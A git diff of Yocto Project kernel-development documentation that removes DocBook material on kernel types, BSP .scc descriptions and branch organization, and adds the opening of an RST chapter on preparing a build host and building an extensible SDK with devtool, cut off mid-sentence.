- <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></ulink>
- variable in the kernel recipe selects the kernel type.
- For example, in the <filename>linux-yocto_4.12.bb</filename>
- kernel recipe found in
- <filename>poky/meta/recipes-kernel/linux</filename>, a
- <ulink url='&YOCTO_DOCS_BB_URL;#require-inclusion'><filename>require</filename></ulink>
- directive includes the
- <filename>poky/meta/recipes-kernel/linux/linux-yocto.inc</filename>
- file, which has the following statement that defines the default
- kernel type:
- <literallayout class='monospaced'>
- LINUX_KERNEL_TYPE ??= "standard"
- </literallayout>
- </para>
-
- <para>
- Another example would be the real-time kernel (i.e.
- <filename>linux-yocto-rt_4.12.bb</filename>).
- This kernel recipe directly sets the kernel type as follows:
- <literallayout class='monospaced'>
- LINUX_KERNEL_TYPE = "preempt-rt"
- </literallayout>
- <note>
- You can find kernel recipes in the
- <filename>meta/recipes-kernel/linux</filename> directory of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky/meta/recipes-kernel/linux/linux-yocto_4.12.bb</filename>).
- See the "<link linkend='using-kernel-metadata-in-a-recipe'>Using Kernel Metadata in a Recipe</link>"
- section for more information.
- </note>
- </para>
-
- <para>
- Three kernel types ("standard", "tiny", and "preempt-rt") are
- supported for Linux Yocto kernels:
- <itemizedlist>
- <listitem><para>"standard":
- Includes the generic Linux kernel policy of the Yocto
- Project linux-yocto kernel recipes.
- This policy includes, among other things, which file
- systems, networking options, core kernel features, and
- debugging and tracing options are supported.
- </para></listitem>
- <listitem><para>"preempt-rt":
- Applies the <filename>PREEMPT_RT</filename>
- patches and the configuration options required to
- build a real-time Linux kernel.
- This kernel type inherits from the "standard" kernel type.
- </para></listitem>
- <listitem><para>"tiny":
- Defines a bare minimum configuration meant to serve as a
- base for very small Linux kernels.
- The "tiny" kernel type is independent from the "standard"
- configuration.
- Although the "tiny" kernel type does not currently include
- any source changes, it might in the future.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For any given kernel type, the Metadata is defined by the
- <filename>.scc</filename> (e.g. <filename>standard.scc</filename>).
- Here is a partial listing for the <filename>standard.scc</filename>
- file, which is found in the <filename>ktypes/standard</filename>
- directory of the <filename>yocto-kernel-cache</filename> Git
- repository:
- <literallayout class='monospaced'>
- # Include this kernel type fragment to get the standard features and
- # configuration values.
-
- # Note: if only the features are desired, but not the configuration
- # then this should be included as:
- # include ktypes/standard/standard.scc nocfg
- # if no chained configuration is desired, include it as:
- # include ktypes/standard/standard.scc nocfg inherit
-
-
-
- include ktypes/base/base.scc
- branch standard
-
- kconf non-hardware standard.cfg
-
- include features/kgdb/kgdb.scc
- .
- .
- .
-
- include cfg/net/ip6_nf.scc
- include cfg/net/bridge.scc
-
- include cfg/systemd.scc
-
- include features/rfkill/rfkill.scc
- </literallayout>
- </para>
-
- <para>
- As with any <filename>.scc</filename> file, a
- kernel type definition can aggregate other
- <filename>.scc</filename> files with
- <filename>include</filename> commands.
- These definitions can also directly pull in
- configuration fragments and patches with the
- <filename>kconf</filename> and <filename>patch</filename>
- commands, respectively.
- </para>
-
- <note>
- It is not strictly necessary to create a kernel type
- <filename>.scc</filename> file.
- The Board Support Package (BSP) file can implicitly define
- the kernel type using a <filename>define
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'>KTYPE</ulink> myktype</filename>
- line.
- See the "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
- section for more information.
- </note>
- </section>
-
- <section id='bsp-descriptions'>
- <title>BSP Descriptions</title>
-
- <para>
- BSP descriptions (i.e. <filename>*.scc</filename> files)
- combine kernel types with hardware-specific features.
- The hardware-specific Metadata is typically defined
- independently in the BSP layer, and then aggregated with each
- supported kernel type.
- <note>
- For BSPs supported by the Yocto Project, the BSP description
- files are located in the <filename>bsp</filename> directory
- of the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache/tree/bsp'><filename>yocto-kernel-cache</filename></ulink>
- repository organized under the "Yocto Linux Kernel" heading
- in the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Yocto Project Source Repositories</ulink>.
- </note>
- </para>
-
- <para>
- This section overviews the BSP description structure, the
- aggregation concepts, and presents a detailed example using
- a BSP supported by the Yocto Project (i.e. BeagleBone Board).
- For complete information on BSP layer file hierarchy, see the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
- </para>
-
- <section id='bsp-description-file-overview'>
- <title>Overview</title>
-
- <para>
- For simplicity, consider the following root BSP layer
- description files for the BeagleBone board.
- These files employ both a structure and naming convention
- for consistency.
- The naming convention for the file is as follows:
- <literallayout class='monospaced'>
- <replaceable>bsp_root_name</replaceable>-<replaceable>kernel_type</replaceable>.scc
- </literallayout>
- Here are some example root layer BSP filenames for the
- BeagleBone Board BSP, which is supported by the Yocto Project:
- <literallayout class='monospaced'>
- beaglebone-standard.scc
- beaglebone-preempt-rt.scc
- </literallayout>
- Each file uses the root name (i.e "beaglebone") BSP name
- followed by the kernel type.
- </para>
-
- <para>
- Examine the <filename>beaglebone-standard.scc</filename>
- file:
- <literallayout class='monospaced'>
- define KMACHINE beaglebone
- define KTYPE standard
- define KARCH arm
-
- include ktypes/standard/standard.scc
- branch beaglebone
-
- include beaglebone.scc
-
- # default policy for standard kernels
- include features/latencytop/latencytop.scc
- include features/profiling/profiling.scc
- </literallayout>
- Every top-level BSP description file should define the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'><filename>KTYPE</filename></ulink>,
- and <ulink url='&YOCTO_DOCS_REF_URL;#var-KARCH'><filename>KARCH</filename></ulink>
- variables.
- These variables allow the OpenEmbedded build system to identify
- the description as meeting the criteria set by the recipe being
- built.
- This example supports the "beaglebone" machine for the
- "standard" kernel and the "arm" architecture.
- </para>
-
- <para>
- Be aware that a hard link between the
- <filename>KTYPE</filename> variable and a kernel type
- description file does not exist.
- Thus, if you do not have the kernel type defined in your kernel
- Metadata as it is here, you only need to ensure that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></ulink>
- variable in the kernel recipe and the
- <filename>KTYPE</filename> variable in the BSP description
- file match.
- </para>
-
- <para>
- To separate your kernel policy from your hardware configuration,
- you include a kernel type (<filename>ktype</filename>), such as
- "standard".
- In the previous example, this is done using the following:
- <literallayout class='monospaced'>
- include ktypes/standard/standard.scc
- </literallayout>
- This file aggregates all the configuration fragments, patches,
- and features that make up your standard kernel policy.
- See the "<link linkend='kernel-types'>Kernel Types</link>"
- section for more information.
- </para>
-
- <para>
- To aggregate common configurations and features specific to the
- kernel for <replaceable>mybsp</replaceable>, use the following:
- <literallayout class='monospaced'>
- include <replaceable>mybsp</replaceable>.scc
- </literallayout>
- You can see that in the BeagleBone example with the following:
- <literallayout class='monospaced'>
- include beaglebone.scc
- </literallayout>
- For information on how to break a complete
- <filename>.config</filename> file into the various
- configuration fragments, see the
- "<link linkend='creating-config-fragments'>Creating Configuration Fragments</link>"
- section.
- </para>
-
- <para>
- Finally, if you have any configurations specific to the
- hardware that are not in a <filename>*.scc</filename> file,
- you can include them as follows:
- <literallayout class='monospaced'>
- kconf hardware <replaceable>mybsp</replaceable>-<replaceable>extra</replaceable>.cfg
- </literallayout>
- The BeagleBone example does not include these types of
- configurations.
- However, the Malta 32-bit board does ("mti-malta32").
- Here is the <filename>mti-malta32-le-standard.scc</filename>
- file:
- <literallayout class='monospaced'>
- define KMACHINE mti-malta32-le
- define KMACHINE qemumipsel
- define KTYPE standard
- define KARCH mips
-
- include ktypes/standard/standard.scc
- branch mti-malta32
-
- include mti-malta32.scc
- kconf hardware mti-malta32-le.cfg
- </literallayout>
- </para>
- </section>
-
- <section id='bsp-description-file-example-minnow'>
- <title>Example</title>
-
- <para>
- Many real-world examples are more complex.
- Like any other <filename>.scc</filename> file, BSP
- descriptions can aggregate features.
- Consider the Minnow BSP definition given the
- <filename>linux-yocto-4.4</filename> branch of the
- <filename>yocto-kernel-cache</filename> (i.e.
- <filename>yocto-kernel-cache/bsp/minnow/minnow.scc</filename>):
- <note>
- Although the Minnow Board BSP is unused, the Metadata
- remains and is being used here just as an example.
- </note>
- <literallayout class='monospaced'>
- include cfg/x86.scc
- include features/eg20t/eg20t.scc
- include cfg/dmaengine.scc
- include features/power/intel.scc
- include cfg/efi.scc
- include features/usb/ehci-hcd.scc
- include features/usb/ohci-hcd.scc
- include features/usb/usb-gadgets.scc
- include features/usb/touchscreen-composite.scc
- include cfg/timer/hpet.scc
- include features/leds/leds.scc
- include features/spi/spidev.scc
- include features/i2c/i2cdev.scc
- include features/mei/mei-txe.scc
-
- # Earlyprintk and port debug requires 8250
- kconf hardware cfg/8250.cfg
-
- kconf hardware minnow.cfg
- kconf hardware minnow-dev.cfg
- </literallayout>
- </para>
-
- <para>
- The <filename>minnow.scc</filename> description file includes
- a hardware configuration fragment
- (<filename>minnow.cfg</filename>) specific to the Minnow
- BSP as well as several more general configuration
- fragments and features enabling hardware found on the
- machine.
- This <filename>minnow.scc</filename> description file is then
- included in each of the three
- "minnow" description files for the supported kernel types
- (i.e. "standard", "preempt-rt", and "tiny").
- Consider the "minnow" description for the "standard" kernel
- type (i.e. <filename>minnow-standard.scc</filename>:
- <literallayout class='monospaced'>
- define KMACHINE minnow
- define KTYPE standard
- define KARCH i386
-
- include ktypes/standard
-
- include minnow.scc
-
- # Extra minnow configs above the minimal defined in minnow.scc
- include cfg/efi-ext.scc
- include features/media/media-all.scc
- include features/sound/snd_hda_intel.scc
-
- # The following should really be in standard.scc
- # USB live-image support
- include cfg/usb-mass-storage.scc
- include cfg/boot-live.scc
-
- # Basic profiling
- include features/latencytop/latencytop.scc
- include features/profiling/profiling.scc
-
- # Requested drivers that don't have an existing scc
- kconf hardware minnow-drivers-extra.cfg
- </literallayout>
- The <filename>include</filename> command midway through the file
- includes the <filename>minnow.scc</filename> description that
- defines all enabled hardware for the BSP that is common to
- all kernel types.
- Using this command significantly reduces duplication.
- </para>
-
- <para>
- Now consider the "minnow" description for the "tiny" kernel
- type (i.e. <filename>minnow-tiny.scc</filename>):
- <literallayout class='monospaced'>
- define KMACHINE minnow
- define KTYPE tiny
- define KARCH i386
-
- include ktypes/tiny
-
- include minnow.scc
- </literallayout>
- As you might expect, the "tiny" description includes quite a
- bit less.
- In fact, it includes only the minimal policy defined by the
- "tiny" kernel type and the hardware-specific configuration
- required for booting the machine along with the most basic
- functionality of the system as defined in the base "minnow"
- description file.
- </para>
-
- <para>
- Notice again the three critical variables:
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'><filename>KTYPE</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KARCH'><filename>KARCH</filename></ulink>.
- Of these variables, only <filename>KTYPE</filename>
- has changed to specify the "tiny" kernel type.
- </para>
- </section>
- </section>
-</section>
-
-<section id='kernel-metadata-location'>
- <title>Kernel Metadata Location</title>
-
- <para>
- Kernel Metadata always exists outside of the kernel tree either
- defined in a kernel recipe (recipe-space) or outside of the recipe.
- Where you choose to define the Metadata depends on what you want
- to do and how you intend to work.
- Regardless of where you define the kernel Metadata, the syntax used
- applies equally.
- </para>
-
- <para>
- If you are unfamiliar with the Linux kernel and only wish
- to apply a configuration and possibly a couple of patches provided to
- you by others, the recipe-space method is recommended.
- This method is also a good approach if you are working with Linux kernel
- sources you do not control or if you just do not want to maintain a
- Linux kernel Git repository on your own.
- For partial information on how you can define kernel Metadata in
- the recipe-space, see the
- "<link linkend='modifying-an-existing-recipe'>Modifying an Existing Recipe</link>"
- section.
- </para>
-
- <para>
- Conversely, if you are actively developing a kernel and are already
- maintaining a Linux kernel Git repository of your own, you might find
- it more convenient to work with kernel Metadata kept outside the
- recipe-space.
- Working with Metadata in this area can make iterative development of
- the Linux kernel more efficient outside of the BitBake environment.
- </para>
-
- <section id='recipe-space-metadata'>
- <title>Recipe-Space Metadata</title>
-
- <para>
- When stored in recipe-space, the kernel Metadata files reside in a
- directory hierarchy below
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>.
- For a linux-yocto recipe or for a Linux kernel recipe derived
- by copying and modifying
- <filename>oe-core/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb</filename>
- to a recipe in your layer, <filename>FILESEXTRAPATHS</filename>
- is typically set to
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-THISDIR'><filename>THISDIR</filename></ulink><filename>}/${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>.
- See the "<link linkend='modifying-an-existing-recipe'>Modifying an Existing Recipe</link>"
- section for more information.
- </para>
-
- <para>
- Here is an example that shows a trivial tree of kernel Metadata
- stored in recipe-space within a BSP layer:
- <literallayout class='monospaced'>
- meta-<replaceable>my_bsp_layer</replaceable>/
- `-- recipes-kernel
- `-- linux
- `-- linux-yocto
- |-- bsp-standard.scc
- |-- bsp.cfg
- `-- standard.cfg
- </literallayout>
- </para>
-
- <para>
- When the Metadata is stored in recipe-space, you must take
- steps to ensure BitBake has the necessary information to decide
- what files to fetch and when they need to be fetched again.
- It is only necessary to specify the <filename>.scc</filename>
- files on the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>.
- BitBake parses them and fetches any files referenced in the
- <filename>.scc</filename> files by the <filename>include</filename>,
- <filename>patch</filename>, or <filename>kconf</filename> commands.
- Because of this, it is necessary to bump the recipe
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
- value when changing the content of files not explicitly listed
- in the <filename>SRC_URI</filename>.
- </para>
-
- <para>
- If the BSP description is in recipe space, you cannot simply list
- the <filename>*.scc</filename> in the <filename>SRC_URI</filename>
- statement.
- You need to use the following form from your kernel append file:
- <literallayout class='monospaced'>
- SRC_URI_append_<replaceable>myplatform</replaceable> = " \
- file://<replaceable>myplatform</replaceable>;type=kmeta;destsuffix=<replaceable>myplatform</replaceable> \
- "
- </literallayout>
- </para>
- </section>
-
- <section id='metadata-outside-the-recipe-space'>
- <title>Metadata Outside the Recipe-Space</title>
-
- <para>
- When stored outside of the recipe-space, the kernel Metadata
- files reside in a separate repository.
- The OpenEmbedded build system adds the Metadata to the build as
- a "type=kmeta" repository through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable.
- As an example, consider the following <filename>SRC_URI</filename>
- statement from the <filename>linux-yocto_4.12.bb</filename>
- kernel recipe:
- <literallayout class='monospaced'>
- SRC_URI = "git://git.yoctoproject.org/linux-yocto-4.12.git;name=machine;branch=${KBRANCH}; \
- git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
- </literallayout>
- <filename>${KMETA}</filename>, in this context, is simply used to
- name the directory into which the Git fetcher places the Metadata.
- This behavior is no different than any multi-repository
- <filename>SRC_URI</filename> statement used in a recipe (e.g.
- see the previous section).
- </para>
-
- <para>
- You can keep kernel Metadata in a "kernel-cache", which is a
- directory containing configuration fragments.
- As with any Metadata kept outside the recipe-space, you simply
- need to use the <filename>SRC_URI</filename> statement with the
- "type=kmeta" attribute.
- Doing so makes the kernel Metadata available during the
- configuration phase.
- </para>
-
- <para>
- If you modify the Metadata, you must not forget to update the
- <filename>SRCREV</filename> statements in the kernel's recipe.
- In particular, you need to update the
- <filename>SRCREV_meta</filename> variable to match the commit in
- the <filename>KMETA</filename> branch you wish to use.
- Changing the data in these branches and not updating the
- <filename>SRCREV</filename> statements to match will cause the
- build to fetch an older commit.
- </para>
- </section>
-</section>
-
-<section id='organizing-your-source'>
- <title>Organizing Your Source</title>
-
- <para>
- Many recipes based on the <filename>linux-yocto-custom.bb</filename>
- recipe use Linux kernel sources that have only a single
- branch - "master".
- This type of repository structure is fine for linear development
- supporting a single machine and architecture.
- However, if you work with multiple boards and architectures,
- a kernel source repository with multiple branches is more
- efficient.
- For example, suppose you need a series of patches for one board to boot.
- Sometimes, these patches are works-in-progress or fundamentally wrong,
- yet they are still necessary for specific boards.
- In these situations, you most likely do not want to include these
- patches in every kernel you build (i.e. have the patches as part of
- the lone "master" branch).
- It is situations like these that give rise to multiple branches used
- within a Linux kernel sources Git repository.
- </para>
-
- <para>
- Repository organization strategies exist that maximize source reuse,
- remove redundancy, and logically order your changes.
- This section presents strategies for the following cases:
- <itemizedlist>
- <listitem><para>Encapsulating patches in a feature description
- and only including the patches in the BSP descriptions of
- the applicable boards.</para></listitem>
- <listitem><para>Creating a machine branch in your
- kernel source repository and applying the patches on that
- branch only.</para></listitem>
- <listitem><para>Creating a feature branch in your
- kernel source repository and merging that branch into your
- BSP when needed.</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The approach you take is entirely up to you
- and depends on what works best for your development model.
- </para>
-
- <section id='encapsulating-patches'>
- <title>Encapsulating Patches</title>
-
- <para>
- if you are reusing patches from an external tree and are not
- working on the patches, you might find the encapsulated feature
- to be appropriate.
- Given this scenario, you do not need to create any branches in the
- source repository.
- Rather, you just take the static patches you need and encapsulate
- them within a feature description.
- Once you have the feature description, you simply include that into
- the BSP description as described in the
- "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
- section.
- </para>
-
- <para>
- You can find information on how to create patches and BSP
- descriptions in the "<link linkend='patches'>Patches</link>" and
- "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
- sections.
- </para>
- </section>
-
- <section id='machine-branches'>
- <title>Machine Branches</title>
-
- <para>
- When you have multiple machines and architectures to support,
- or you are actively working on board support, it is more
- efficient to create branches in the repository based on
- individual machines.
- Having machine branches allows common source to remain in the
- "master" branch with any features specific to a machine stored
- in the appropriate machine branch.
- This organization method frees you from continually reintegrating
- your patches into a feature.
- </para>
-
- <para>
- Once you have a new branch, you can set up your kernel Metadata
- to use the branch a couple different ways.
- In the recipe, you can specify the new branch as the
- <filename>KBRANCH</filename> to use for the board as
- follows:
- <literallayout class='monospaced'>
- KBRANCH = "mynewbranch"
- </literallayout>
- Another method is to use the <filename>branch</filename> command
- in the BSP description:
- <literallayout class='monospaced'>
- mybsp.scc:
- define KMACHINE mybsp
- define KTYPE standard
- define KARCH i386
- include standard.scc
-
- branch mynewbranch
-
- include mybsp-hw.scc
- </literallayout>
- </para>
-
- <para>
- If you find yourself with numerous branches, you might consider
- using a hierarchical branching system similar to what the
- Yocto Linux Kernel Git repositories use:
- <literallayout class='monospaced'>
- <replaceable>common</replaceable>/<replaceable>kernel_type</replaceable>/<replaceable>machine</replaceable>
- </literallayout>
- </para>
-
- <para>
- If you had two kernel types, "standard" and "small" for
- instance, three machines, and <replaceable>common</replaceable>
- as <filename>mydir</filename>, the branches in your
- Git repository might look like this:
- <literallayout class='monospaced'>
- mydir/base
- mydir/standard/base
- mydir/standard/machine_a
- mydir/standard/machine_b
- mydir/standard/machine_c
- mydir/small/base
- mydir/small/machine_a
- </literallayout>
- </para>
-
- <para>
- This organization can help clarify the branch relationships.
- In this case, <filename>mydir/standard/machine_a</filename>
- includes everything in <filename>mydir/base</filename> and
- <filename>mydir/standard/base</filename>.
- The "standard" and "small" branches add sources specific to those
- kernel types that for whatever reason are not appropriate for the
- other branches.
- <note>
- The "base" branches are an artifact of the way Git manages
- its data internally on the filesystem: Git will not allow you
- to use <filename>mydir/standard</filename> and
- <filename>mydir/standard/machine_a</filename> because it
- would have to create a file and a directory named "standard".
- </note>
- </para>
- </section>
-
- <section id='feature-branches'>
- <title>Feature Branches</title>
-
- <para>
- When you are actively developing new features, it can be more
- efficient to work with that feature as a branch, rather than
- as a set of patches that have to be regularly updated.
- The Yocto Project Linux kernel tools provide for this with
- the <filename>git merge</filename> command.
- </para>
-
- <para>
- To merge a feature branch into a BSP, insert the
- <filename>git merge</filename> command after any
- <filename>branch</filename> commands:
- <literallayout class='monospaced'>
- mybsp.scc:
- define KMACHINE mybsp
- define KTYPE standard
- define KARCH i386
- include standard.scc
-
- branch mynewbranch
- git merge myfeature
-
- include mybsp-hw.scc
- </literallayout>
- </para>
- </section>
-</section>
-
-<section id='scc-reference'>
- <title>SCC Description File Reference</title>
-
- <para>
- This section provides a brief reference for the commands you can use
- within an SCC description file (<filename>.scc</filename>):
- <itemizedlist>
- <listitem><para>
- <filename>branch [ref]</filename>:
- Creates a new branch relative to the current branch
- (typically <filename>${KTYPE}</filename>) using
- the currently checked-out branch, or "ref" if specified.
- </para></listitem>
- <listitem><para>
- <filename>define</filename>:
- Defines variables, such as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'><filename>KTYPE</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KARCH'><filename>KARCH</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KFEATURE_DESCRIPTION'><filename>KFEATURE_DESCRIPTION</filename></ulink>.
- </para></listitem>
- <listitem><para>
- <filename>include SCC_FILE</filename>:
- Includes an SCC file in the current file.
- The file is parsed as if you had inserted it inline.
- </para></listitem>
- <listitem><para>
- <filename>kconf [hardware|non-hardware] CFG_FILE</filename>:
- Queues a configuration fragment for merging into the final
- Linux <filename>.config</filename> file.</para></listitem>
- <listitem><para>
- <filename>git merge GIT_BRANCH</filename>:
- Merges the feature branch into the current branch.
- </para></listitem>
- <listitem><para>
- <filename>patch PATCH_FILE</filename>:
- Applies the patch to the current Git branch.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-common.rst b/documentation/kernel-dev/kernel-dev-common.rst
new file mode 100644
index 0000000000..6b5e9484d0
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-common.rst
@@ -0,0 +1,2031 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Common Tasks
+************
+
+This chapter presents several common tasks you perform when you work
+with the Yocto Project Linux kernel. These tasks include preparing your
+host development system for kernel development, preparing a layer,
+modifying an existing recipe, patching the kernel, configuring the
+kernel, iterative development, working with your own sources, and
+incorporating out-of-tree modules.
+
+.. note::
+
+ The examples presented in this chapter work with the Yocto Project
+ 2.4 Release and forward.
+
+Preparing the Build Host to Work on the Kernel
+==============================================
+
+Before you can do any kernel development, you need to be sure your build
+host is set up to use the Yocto Project. For information on how to get
+set up, see the ":doc:`../dev-manual/dev-manual-start`" section in
+the Yocto Project Development Tasks Manual. Part of preparing the system
+is creating a local Git repository of the
+:term:`Source Directory` (``poky``) on your system. Follow the steps in the
+":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+section in the Yocto Project Development Tasks Manual to set up your
+Source Directory.
+
+.. note::
+
+ Be sure you check out the appropriate development branch or you
+ create your local branch by checking out a specific tag to get the
+ desired version of Yocto Project. See the
+ ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`" and
+ ":ref:`dev-manual/dev-manual-start:checking out by tag in poky`"
+ sections in the Yocto Project Development Tasks Manual for more information.
+
+Kernel development is best accomplished using
+:ref:`devtool <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow>`
+and not through traditional kernel workflow methods. The remainder of
+this section provides information for both scenarios.
+
+Getting Ready to Develop Using ``devtool``
+------------------------------------------
+
+Follow these steps to prepare to update the kernel image using
+``devtool``. Completing this procedure leaves you with a clean kernel
+image and ready to make modifications as described in the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+section:
+
+1. *Initialize the BitBake Environment:* Before building an extensible
+ SDK, you need to initialize the BitBake build environment by sourcing
+ the build environment script (i.e. :ref:`structure-core-script`):
+ ::
+
+ $ cd ~/poky
+ $ source oe-init-build-env
+
+ .. note::
+
+ The previous commands assume the
+ :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+ (i.e. ``poky``) have been cloned using Git and the local repository is named
+ "poky".
+
+2. *Prepare Your local.conf File:* By default, the
+ :term:`MACHINE` variable is set to
+ "qemux86-64", which is fine if you are building for the QEMU emulator
+ in 64-bit mode. However, if you are not, you need to set the
+ ``MACHINE`` variable appropriately in your ``conf/local.conf`` file
+ found in the
+ :term:`Build Directory` (i.e.
+ ``~/poky/build`` in this example).
+
+ Also, since you are preparing to work on the kernel image, you need
+ to set the
+ :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+ variable to include kernel modules.
+
+ In this example we wish to build for qemux86 so we must set the
+ ``MACHINE`` variable to "qemux86" and also add the "kernel-modules".
+ As described we do this by appending to ``conf/local.conf``:
+ ::
+
+ MACHINE = "qemux86"
+ MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
+
+3. *Create a Layer for Patches:* You need to create a layer to hold
+ patches created for the kernel image. You can use the
+ ``bitbake-layers create-layer`` command as follows:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake-layers create-layer ../../meta-mylayer
+ NOTE: Starting bitbake server...
+ Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
+ $
+
+ .. note::
+
+ For background information on working with common and BSP layers,
+ see the
+ ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section in the Yocto Project Development Tasks Manual and the
+ ":ref:`bsp-guide/bsp:bsp layers`" section in the Yocto Project Board
+ Support (BSP) Developer's Guide, respectively. For information on how to
+ use the ``bitbake-layers create-layer`` command to quickly set up a layer,
+ see the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+ section in the Yocto Project Development Tasks Manual.
+
+4. *Inform the BitBake Build Environment About Your Layer:* As directed
+ when you created your layer, you need to add the layer to the
+ :term:`BBLAYERS` variable in the
+ ``bblayers.conf`` file as follows:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake-layers add-layer ../../meta-mylayer
+ NOTE: Starting bitbake server...
+ $
+
+5. *Build the Extensible SDK:* Use BitBake to build the extensible SDK
+ specifically for use with images to be run using QEMU:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake core-image-minimal -c populate_sdk_ext
+
+ Once
+ the build finishes, you can find the SDK installer file (i.e.
+ ``*.sh`` file) in the following directory:
+ ::
+
+ ~/poky/build/tmp/deploy/sdk
+
+ For this example, the installer file is named
+ ``poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-DISTRO.sh``.
+
+6. *Install the Extensible SDK:* Use the following command to install
+ the SDK. For this example, install the SDK in the default
+ ``~/poky_sdk`` directory:
+ ::
+
+ $ cd ~/poky/build/tmp/deploy/sdk
+ $ ./poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-3.1.2.sh
+ Poky (Yocto Project Reference Distro) Extensible SDK installer version 3.1.2
+ ============================================================================
+ Enter target directory for SDK (default: ~/poky_sdk):
+ You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
+ Extracting SDK......................................done
+ Setting it up...
+ Extracting buildtools...
+ Preparing build system...
+ Parsing recipes: 100% |#################################################################| Time: 0:00:52
+ Initializing tasks: 100% |############## ###############################################| Time: 0:00:04
+ Checking sstate mirror object availability: 100% |######################################| Time: 0:00:00
+ Parsing recipes: 100% |#################################################################| Time: 0:00:33
+ Initializing tasks: 100% |##############################################################| Time: 0:00:00
+ done
+ SDK has been successfully set up and is ready to be used.
+ Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
+ $ . /home/scottrif/poky_sdk/environment-setup-i586-poky-linux
+
+
+7. *Set Up a New Terminal to Work With the Extensible SDK:* You must set
+ up a new terminal to work with the SDK. You cannot use the same
+ BitBake shell used to build the installer.
+
+ After opening a new shell, run the SDK environment setup script as
+ directed by the output from installing the SDK:
+ ::
+
+ $ source ~/poky_sdk/environment-setup-i586-poky-linux
+ "SDK environment now set up; additionally you may now run devtool to perform development tasks.
+ Run devtool --help for further details.
+
+ .. note::
+
+ If you get a warning about attempting to use the extensible SDK in
+ an environment set up to run BitBake, you did not use a new shell.
+
+8. *Build the Clean Image:* The final step in preparing to work on the
+ kernel is to build an initial image using ``devtool`` in the new
+ terminal you just set up and initialized for SDK work:
+ ::
+
+ $ devtool build-image
+ Parsing recipes: 100% |##########################################| Time: 0:00:05
+ Parsing of 830 .bb files complete (0 cached, 830 parsed). 1299 targets, 47 skipped, 0 masked, 0 errors.
+ WARNING: No packages to add, building image core-image-minimal unmodified
+ Loading cache: 100% |############################################| Time: 0:00:00
+ Loaded 1299 entries from dependency cache.
+ NOTE: Resolving any missing task queue dependencies
+ Initializing tasks: 100% |#######################################| Time: 0:00:07
+ Checking sstate mirror object availability: 100% |###############| Time: 0:00:00
+ NOTE: Executing SetScene Tasks
+ NOTE: Executing RunQueue Tasks
+ NOTE: Tasks Summary: Attempted 2866 tasks of which 2604 didn't need to be rerun and all succeeded.
+ NOTE: Successfully built core-image-minimal. You can find output files in /home/scottrif/poky_sdk/tmp/deploy/images/qemux86
+
+ If you were
+ building for actual hardware and not for emulation, you could flash
+ the image to a USB stick on ``/dev/sdd`` and boot your device. For an
+ example that uses a Minnowboard, see the
